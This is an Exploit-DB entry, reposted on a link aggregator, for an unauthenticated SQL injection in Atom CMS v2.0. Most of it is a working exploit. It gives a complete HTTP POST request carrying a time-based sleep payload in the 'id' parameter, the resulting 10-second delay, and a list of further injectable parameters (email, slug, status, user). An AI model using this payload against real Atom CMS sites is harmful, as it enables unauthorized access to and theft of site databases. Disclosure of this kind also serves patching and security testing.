7

[webapps] Atom CMS v2.0 - SQL Injection (no auth)

 1 year ago
source link: https://www.exploit-db.com/exploits/51086
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Atom CMS v2.0 - SQL Injection (no auth)

EDB-ID:

51086

EDB Verified:

Platform:

PHP

Date:

2023-03-27

Vulnerable App:

# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example
-----------------------------------------------------------------------------------------------------------------------
Param: id
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1
--------------------------------------------------------------------------------------------------------------------- --
Response wait 10 sec
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/Atom.CMS-master/admin/index.php [email]
/Atom.CMS-master/admin/index.php [id]
/Atom.CMS-master/admin/index.php [slug]
/Atom.CMS-master/admin/index.php [status]
/Atom.CMS-master/admin/index.php [user]

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK